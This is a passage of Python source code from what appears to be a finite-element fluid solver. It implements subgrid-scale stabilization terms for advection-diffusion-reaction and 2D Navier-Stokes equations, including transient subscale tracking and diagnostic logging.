                    #unless the accumulate subgrid term has been called this will miss old subgrid mass
dt = self.timeIntegration.dt
assert dt > 0.0
dtInv = 1.0/dt
self.subgridTmp2_ip[ci][:] = self.subgridError_ip_last[ci]
self.subgridTmp2_ip[ci] *= dtInv
self.subgridTmp2_ip[ci] *= self.subgridErrorMassCoef_ip_last[ci]#figure this out
logEvent("HaukeSangalli pdeResidualInterpolant accumulating subgridHistory dt=%s subgridError_ip_last.max=%s subgridError_ip_last.min=%s " % (dt,
self.subgridError_ip_last[ci].max(),
self.subgridError_ip_last[ci].min()),1)
#should be -=
self.subgridTmp_ip[ci] -= self.subgridTmp2_ip[ci]
#
self.strongResidualInterpolant[ci].projectFromInterpolationConditions(self.subgridTmp_ip[ci])
def calculateSubgridError(self,q):
#calculate tau's
for ci in range(self.nc):
#calculate interpolant here if want gradient stabilization to be for R_h instead of \tilde{R}_h
if not self.includeSubgridScalesInGradientStabilization:
self.calculateSubgridErrorInterpolants(ci)
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_Sangalli_tau_sd(self.coefficients.sdInfo[(ci,ci)][0],self.coefficients.sdInfo[(ci,ci)][1],
q['inverse(J)'],
q[('dmt',ci,ci)],
q[('df',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci],
self.tau_gradient[ci])
            else:
                assert False, "only sparse diffusion (sd) coefficient storage is handled here"
if self.lag:
tau=self.tau_last[ci]
tau_gradient=self.tau_gradient_last[ci]
else:
tau=self.tau[ci]
tau_gradient = self.tau_gradient[ci]
if self.trackSubScales:
#Repeat for interpolation points
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_Sangalli_tau_sd(self.coefficients.sdInfo[(ci,ci)][0],self.coefficients.sdInfo[(ci,ci)][1],
self.cip['inverse(J)'],
self.cip[('dmt',ci,ci)],
self.cip[('df',ci,ci)],
self.cip[('a',ci,ci)],
self.cip[('da',ci,ci,ci)],
self.cip[('grad(phi)',ci)],
self.cip[('dphi',ci,ci)],
self.cip[('dr',ci,ci)],
self.cip[('pe',ci)],
self.cip[('cfl',ci)],
self.tau_ip[ci],
self.tau_gradient_ip[ci])
                else:
                    assert False, "only sparse diffusion (sd) coefficient storage is handled here"
if self.lag:
tau_ip=self.tau_ip_last[ci]
tau_gradient_ip=self.tau_gradient_ip_last[ci]
else:
                tau_ip=self.tau_ip[ci]
tau_gradient_ip = self.tau_gradient_ip[ci]
#mwf hack
if self.tau_00_force != None:
tau.fill(self.tau_00_force)
if self.trackSubScales: tau_ip.fill(self.tau_00_force)
if self.tau_11_force != None:
tau_gradient.fill(self.tau_11_force)
if self.trackSubScales: tau_gradient_ip.fill(self.tau_11_force)
#mwf debug
#import pdb
#pdb.set_trace()
if self.trackSubScales:
#mwf debug
print "HaukeSangalli_ASGS trackScales tau[ci].max= %s " % (tau[ci].max())
#
#would be nice to have dt^{n+1} alone, try to get this from timeIntegration directly?
dt = self.timeIntegration.dt
assert dt > 0.0
dtInv = 1.0/dt
#calculate \tilde{R}_h = R_h - \delta m^{n}/dt^{n+1}
self.subgridTmp[ci][:] = self.subgridError_last[ci]
self.subgridTmp[ci] *= dtInv
self.subgridTmp[ci] *= self.subgridErrorMassCoef_last[ci]#figure this out
q[('pdeResidual',ci)] -= self.subgridTmp[ci] #R_h --> \tilde{R}_h
#calculate \tilde{R}_h = R_h - \delta m^{n}/dt^{n+1}
self.subgridTmp_ip[ci][:] = self.subgridError_ip_last[ci]
self.subgridTmp_ip[ci] *= dtInv
self.subgridTmp_ip[ci] *= self.subgridErrorMassCoef_ip_last[ci]#figure this out
self.cip[('pdeResidual',ci)] -= self.subgridTmp_ip[ci] #R_h --> \tilde{R}_h
#
for cj in range(self.nc):
if q.has_key(('dpdeResidual',ci,cj)):
csubgridError.calculateSubgridError_tauRes(tau,
q[('pdeResidual',ci)],
q[('dpdeResidual',ci,cj)],
q[('subgridError',ci)],
q[('dsubgridError',ci,cj)])
if self.trackSubScales:
for cj in range(self.nc):
if self.cip.has_key(('dpdeResidual',ci,cj)):
csubgridError.calculateSubgridError_tauRes(tau_ip,
self.cip[('pdeResidual',ci)],
self.cip[('dpdeResidual',ci,cj)],
self.cip[('subgridError',ci)],
self.cip[('dsubgridError',ci,cj)])
logEvent("HaukeSangalli cip.subgridError.max=%s cip.subgridError.min=%s cq.subgridError.max=%s cq.subgridError.min=%s " % (self.cip[('subgridError',ci)].max(),
self.cip[('subgridError',ci)].min(),
q[('subgridError',ci)].max(),
q[('subgridError',ci)].min()),1)
#computing interpolant here will pick up \tilde{R}_h
if self.includeSubgridScalesInGradientStabilization:
#have to make sure interpolant has subgrid history update too
self.calculateSubgridErrorInterpolants(ci)
#mwf debug
#import pdb
#pdb.set_trace()
self.strongResidualInterpolant[ci].getGradientValues(q[('grad(v)',ci)],
q[('grad(pdeResidual)',ci)])
for cj in range(self.nc):
if q.has_key(('dpdeResidual',ci,cj)):
csubgridError.calculateSubgridErrorGradient_tauRes(tau_gradient,
q[('grad(pdeResidual)',ci)],
q[('grad(subgridError)',ci)])
#have got to come up with way to handle jacobian
q[('dgrad(subgridError)',ci,cj)].flat[:] = q[('dmt',ci,cj)].flat
q[('dgrad(subgridError)',ci,cj)] += q[('dr',ci,cj)]
self.subgridTmp[ci].flat[:] = q[('dmt_sge',ci,cj)].flat
self.subgridTmp[ci] += q[('dr',ci,cj)]
q[('dgrad(subgridError)',ci,cj)] *= self.subgridTmp[ci]
q[('dgrad(subgridError)',ci,cj)] *= tau_gradient
q[('dgrad(subgridError)',ci,cj)] *= -1.0
#below works for just dmt approx for residual
#q[('dgrad(subgridError)',ci,cj)].flat[:] = tau_gradient.flat
#q[('dgrad(subgridError)',ci,cj)] *= -1.0
#q[('dgrad(subgridError)',ci,cj)] *= q[('dmt_sge',ci,cj)]
#q[('dgrad(subgridError)',ci,cj)] *= q[('dmt',ci,cj)]
#
logEvent("HaukeSangalli pdeResidual[ci].max = %s subgridError.max = %s subgridError.min= %s " % (q[('pdeResidual',ci)].max(),
q[('subgridError',ci)].max(),
q[('subgridError',ci)].min()),1)
logEvent("HaukeSangalliTrackSubScales ADR tau_00.max() = %s tau_11.max() = %s grad(pdeResidual).max= %s grad(subgridError).max= %s dgrad(subgridError).max= %s " % (tau.max(),tau_gradient.max(),
q[('grad(pdeResidual)',ci)].max(),
q[('grad(subgridError)',ci)].max(),
q[('dgrad(subgridError)',ci,ci)].max()),1)
#mwf debug
#import pdb
#pdb.set_trace()
# print "tau",tau
# print "pdeResidual",q[('pdeResidual',ci)]
# print "dpdeResidual",q[('dpdeResidual',ci,ci)]
# print "subgrid error",q[('subgridError',ci)]
# print "dsubgrid error",q[('dsubgridError',ci,ci)]
def updateSubgridErrorHistory(self,initializationPhase=False):
AdvectionDiffusionReactionHaukeSangalliInterpolant_ASGS.updateSubgridErrorHistory(self,initializationPhase)
if self.trackSubScales:
for ci in range(self.nc):
if not initializationPhase:
#mwf I believe we are storing subgridError = tau*Res so need to reverse sign
self.subgridError_last[ci].flat[:] = self.cq[('subgridError',ci)].flat
self.subgridError_last[ci] *= -1.0
#
self.subgridError_ip_last[ci].flat[:] = self.cip[('subgridError',ci)].flat
self.subgridError_ip_last[ci] *= -1.0
#mwf debug
logEvent("HaukeSangalliTrackSubScales ADR tracksubscales updateSubgridErrorHistory max subgridError = %s at ip max= %s " % (self.subgridError_last[ci].max(),
self.subgridError_ip_last[ci].max()),1)
#how are we going to define subgrid mass?
self.subgridErrorMassCoef_last[ci].flat[:] = self.cq[('dm',ci,ci)].flat
self.subgridErrorMassCoef_ip_last[ci].flat[:] = self.cip[('dm',ci,ci)].flat
def accumulateSubgridMassHistory(self,q):
"""
incorporate subgrid scale mass accumulation
        \delta m^{n}/\Delta t^{n+1}
"""
if self.trackSubScales:
#mwf debug
#import pdb
#pdb.set_trace()
for ci in range(self.nc):
self.subgridTmp[ci][:] = self.subgridError_last[ci]
#would be nice to have dt^{n+1} alone
dt = self.timeIntegration.dt
assert dt > 0.0
dtInv = 1.0/dt
self.subgridTmp[ci] *= dtInv
self.subgridTmp[ci] *= self.subgridErrorMassCoef_last[ci]#figure this out
#mwf debug
logEvent("HaukeSangalliTrackSubScales accumulating delta u^n.abs.max= %s dm.max=%s " % (max(numpy.absolute(self.subgridTmp[ci].flat)),max(numpy.absolute(self.subgridErrorMassCoef_last[ci].flat))),1)
#mwf should be
q[('mt',ci)] -= self.subgridTmp[ci]
#don't think this matters right now because called after calculateSubgridError
self.subgridTmp_ip[ci][:] = self.subgridError_ip_last[ci]
self.subgridTmp_ip[ci] *= dtInv
self.subgridTmp_ip[ci] *= self.subgridErrorMassCoef_ip_last[ci]#figure this out
self.cip[('mt',ci)] -= self.subgridTmp_ip[ci]
#
class NavierStokesTransientSubScalesASGS_velocity_pressure(NavierStokesASGS_velocity_pressure):
def __init__(self,coefficients,nd,stabFlag='1',lag=False,delayLagSteps=5,hFactor=1,noPressureStabilization=False,
trackSubScales=False,limit_tau_t=False,tau_t_limit_min=0.0,tau_t_limit_max=1.0):
NavierStokesASGS_velocity_pressure.__init__(self,coefficients,nd,stabFlag=stabFlag,lag=lag,delayLagSteps=delayLagSteps,hFactor=hFactor,
noPressureStabilization=noPressureStabilization)
self.trackSubScales = trackSubScales
self.timeIntegration = None
#apply bounds to tau_t?
self.limit_tau_t = limit_tau_t
self.tau_t_limit_min = tau_t_limit_min
self.tau_t_limit_max = tau_t_limit_max
self.trackSubScales_pressure = True
def initializeElementQuadrature(self,mesh,t,cq):
NavierStokesASGS_velocity_pressure.initializeElementQuadrature(self,mesh,t,cq)
import copy
self.subgridError_last = []
self.subgridErrorMassCoef_last = []
self.subgridTmp = []; self.subgridTmp2 = []
for ci in range(self.nc):
self.subgridTmp.append(numpy.zeros(cq[('u',ci)].shape,'d'))
if self.trackSubScales:
self.subgridError_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.subgridErrorMassCoef_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.subgridTmp2.append(numpy.zeros(cq[('u',ci)].shape,'d'))
else:
self.subgridError_last.append(None)
self.subgridErrorMassCoef_last.append(None)
if self.lag:
if cq.has_key(('dm',ci,ci)):
cq[('dm_sge',ci,ci)] = copy.deepcopy(cq[('dm',ci,ci)])
if cq.has_key(('dmt',ci,ci)):
cq[('dmt_sge',ci,ci)] = copy.deepcopy(cq[('dmt',ci,ci)])
else:
if cq.has_key(('dm',ci,ci)):
cq[('dm_sge',ci,ci)] = cq[('dm',ci,ci)]
if cq.has_key(('dmt',ci,ci)):
cq[('dmt_sge',ci,ci)] = cq[('dmt',ci,ci)]
def initializeTimeIntegration(self,timeIntegration):
"""
allow for connection with time integration method if tracking subscales
"""
self.timeIntegration = timeIntegration
def updateSubgridErrorHistory(self,initializationPhase=False):
NavierStokesASGS_velocity_pressure.updateSubgridErrorHistory(self,initializationPhase=initializationPhase)
if self.lag:
for ci in range(1,self.nc):
self.cq[('dm_sge',ci,ci)][:] = self.cq[('dm',ci,ci)]
if self.trackSubScales:
#momentum terms
for ci in range(1,self.nc):
if not initializationPhase:
#we are storing subgridError = tau*Res so need to reverse sign
self.subgridError_last[ci].flat[:] = self.cq[('subgridError',ci)].flat
self.subgridError_last[ci] *= -1.0
#mwf debug
logEvent("NS_ASGS tracksubscales updateSubgridErrorHistory subgridError[%s] max = %s min = %s " % (ci,self.subgridError_last[ci].max(),
self.subgridError_last[ci].min()),1)
#how are we going to define subgrid mass?
self.subgridErrorMassCoef_last[ci].flat[:] = self.cq[('dm',ci,ci)].flat
#for pressure we have to store strong residual
if not initializationPhase:
self.subgridError_last[0].flat[:] = self.cq[('pdeResidual',0)].flat
logEvent("NS_ASGS tracksubscales updateSubgridErrorHistory subgridError[0] max = %s min = %s " % (self.subgridError_last[0].max(),
self.subgridError_last[0].min() ),1)
def accumulateSubgridMassHistory(self,q):
"""
incorporate subgrid scale mass accumulation
        \delta m^{n}/\Delta t^{n+1}
"""
if self.trackSubScales:
for ci in range(1,self.nc):
self.subgridTmp[ci][:] = self.subgridError_last[ci]
dt = self.timeIntegration.dt
assert dt > 0.0
dtInv = 1.0/dt
self.subgridTmp[ci] *= dtInv
self.subgridTmp[ci] *= self.subgridErrorMassCoef_last[ci]#decide how to approximate
logEvent("NS_ASGS trackSubScales accumulating delta u^n ci=%s .abs.max= %s dm.max=%s " % (ci,max(numpy.absolute(self.subgridTmp[ci].flat)),
max(numpy.absolute(self.subgridErrorMassCoef_last[ci].flat))),1)
q[('mt',ci)] -= self.subgridTmp[ci]
def calculateSubgridError(self,q):
import LinearAlgebraTools
oldTau=True
if self.nd == 2:
if self.lag and self.nSteps < self.delayLagSteps:
v = q[('f',0)]
elif self.lag:
v = self.v_last
else:
v = q[('f',0)]
dmttmp = q[('dmt',1,1)]
if self.trackSubScales:
self.subgridTmp[1].fill(0.0)
dmttmp = self.subgridTmp[1]
if oldTau:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau_sd(self.hFactor,
self.mesh.elementDiametersArray,
dmttmp,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau(self.hFactor,
self.mesh.elementDiametersArray,
dmttmp,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorNavierStokes2D_generic_tau_sd(q['inverse(J)'],
dmttmp,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
csubgridError.calculateSubgridErrorNavierStokes2D_generic_tau(q['inverse(J)'],
dmttmp,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
tau0=self.tau[0]
tau1=self.tau[1]
#mwf seeing some difference in tau0 and self.tau_last
#need to synchronize the lagging
#tau0 = self.tau_last[0]
#tau1 = self.tau_last[1]
#TODO: make sure dm_sge is set correctly for lagging
dm_subgrid = q[('dm_sge',1,1)]#density same for both velocity components
if self.trackSubScales:
dt = self.timeIntegration.dt
assert dt > 0.0
dtInv = 1.0/dt
#pressure,
# \delta p = -tau_1*(1+tau_0/dt)*R^{n+1}_p + tau_1*tau_0/dt*R^n_p
#recall that code is expecting subgridError to be tau*R instead of -tau*R
logEvent("NS_ASGS trackScales before transient modficication (tau_s) tau[0].max= %s tau[0].min=%s " % (tau0.max(),tau0.min()),1)
logEvent("NS_ASGS trackScales before transient modficication (tau_s) tau[1].max= %s tau[1].min=%s " % (tau1.max(),tau1.min()),1)
if self.lag:
logEvent("NS_ASGS trackScales before transient modficication (tau_s) nSteps=%d delayLagSteps=%d tau_last[0].max= %s tau_last[0].min= %s " % (self.nSteps,
self.delayLagSteps,
self.tau_last[0].max(),self.tau_last[0].min()),1)
#tau for current pressure subgridError
self.subgridTmp[0][:] = tau0
self.subgridTmp[0] *= dtInv
self.subgridTmp[0] += 1.0
self.subgridTmp[0] *= tau1
#mwf codina has an extra 1/4 in tau?
self.subgridTmp[0] *= 0.25
#tau for history term when updating pressure subgrid error
self.subgridTmp2[0][:] = tau0
self.subgridTmp2[0] *= dtInv
self.subgridTmp2[0] *= tau1
#mwf codina has an extra 1/4 in tau?
self.subgridTmp2[0] *= 0.25
#now modify tau0 --> tau_t0
if tau0.max() > 0.0:
#mwf debug
#import pdb
#pdb.set_trace()
self.subgridTmp[1][:] = tau0
self.subgridTmp[1] *= dt
self.subgridTmp2[1][:] = tau0
self.subgridTmp2[1] *= dm_subgrid
self.subgridTmp2[1] += dt
self.subgridTmp[1] /= self.subgridTmp2[1]
#bound tau_t based on dt size
if self.limit_tau_t:
numpy.clip(self.subgridTmp[1],self.tau_t_limit_min*dt,self.tau_t_limit_max*dt,self.subgridTmp[1])
#
#set tau0 --> to point to subgridTmp[1] since this multiplies momentum residual
#set tau1 --> to point to subgridTmp[0] since this multiplies continuity residual
tau0 = self.subgridTmp[1]
tau1 = self.subgridTmp[0]
#mwf debug
logEvent("NS_ASGS trackScales after modifying tau[0].max= %s tau[0].min= %s " % (tau0.max(),tau0.min()),1)
logEvent("NS_ASGS trackScales after modifying tau[1].max= %s tau[1].min= %s " % (tau1.max(),tau1.min()),1)
#mwf should be 1.0/m'
                assert tau0.max() * dm_subgrid.max() /dt <= 1.0, "Subgrid scales, modified tau_t.max() = %s dt = %s dm_subgrid.max() = %s tau_t*m'/dt = %s must be less than 1 " % (tau0.max(),
                                                                                                                                                                                    dt,
                                                                                                                                                                                    dm_subgrid.max(),
                                                                                                                                                                                    tau0.max()*dm_subgrid.max()/dt)
#
#account for old subgrid error in momentum strong residual
for ci in range(1,self.nc):
#tau here should be the same as tau_t in Codina's formalism if dmdt is included?
#calculate \tilde{R}_h = R_h - \delta m^{n}/dt^{n+1}
self.subgridTmp2[ci][:] = self.subgridError_last[ci]
self.subgridTmp2[ci] *= dtInv
self.subgridTmp2[ci] *= self.subgridErrorMassCoef_last[ci]#decide what time level to use
q[('pdeResidual',ci)] -= self.subgridTmp2[ci] #R_h --> \tilde{R}_h
#momentum components
#end track subgrid scales
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tauRes(tau0,
tau1,
q[('pdeResidual',0)],
q[('dpdeResidual',0,1)],
q[('dpdeResidual',0,2)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('dpdeResidual',1,2)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,1)],
q[('dpdeResidual',2,2)],
q[('subgridError',0)],
q[('dsubgridError',0,1)],
q[('dsubgridError',0,2)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('dsubgridError',1,2)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,1)],
q[('dsubgridError',2,2)])
if self.trackSubScales and self.trackSubScales_pressure:
#modify subgrid pressure error, tau1*tau0/dt sits in subgridTmp2[0]
self.subgridTmp2[0] *= self.subgridError_last[0]
q[('subgridError',0)] -= self.subgridTmp2[0]
if self.noPressureStabilization:
q[('subgridError',0)][:]=0.0
q[('dsubgridError',0,1)][:]=0.0
q[('dsubgridError',0,2)][:]=0.0
#
for ci in range(self.nc):
if q.has_key(('mt',ci)):
logEvent("NS_ASGS trackSubScales calculateSubgridError mt[%s] max= %s min=%s " % (ci,q[('mt',ci)].max(),q[('mt',ci)].min()),1)
logEvent("NS_ASGS trackSubScales calculateSubgridError pdeResidual[%s] max= %s min=%s " % (ci,q[('pdeResidual',ci)].max(),q[('pdeResidual',ci)].min()),1)
logEvent("NS_ASGS trackSubScales calculateSubgridError subgridError[%s] max= %s min=%s " % (ci,q[('subgridError',ci)].max(),q[('subgridError',ci)].min()),1)
if self.trackSubScales:
logEvent("NS_ASGS trackSubScales calculateSubgridError subgridError_last[%s] max= %s min=%s " % (ci,self.subgridError_last[ci].max(),self.subgridError_last[ci].min()),1)
for cj in range(self.nc):
if q.has_key(('df_sge',ci,cj)):
logEvent("NS_ASGS trackSubScales calculateSubgridError df_sge %s %s max= %s min=%s " % (ci,cj,q[('df_sge',ci,cj)].max(),q[('df_sge',ci,cj)].min()),1)
        elif self.nd == 3:
            assert False, "3D transient subscales are not implemented"
for ci in range(self.nd):
q[('cfl',ci+1)][:] = q[('cfl',0)]
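#Illustrative sketch only: the transient pressure subscale assembled in
#NavierStokesTransientSubScalesASGS_velocity_pressure.calculateSubgridError above,
#  \delta p = -tau_1*(1 + tau_0/dt)*R_p^{n+1} + tau_1*tau_0/dt*R_p^{n},
#including the extra Codina factor of 1/4 that the code applies to both taus.
#Argument names are hypothetical numpy arrays.
def _sketch_transient_pressure_subscale(tau0,tau1,Rp_new,Rp_old,dt):
    assert dt > 0.0
    tau_current = 0.25*tau1*(1.0 + tau0/dt) #multiplies the new continuity residual
    tau_history = 0.25*tau1*tau0/dt         #multiplies the stored residual R_p^{n}
    return -tau_current*Rp_new + tau_history*Rp_old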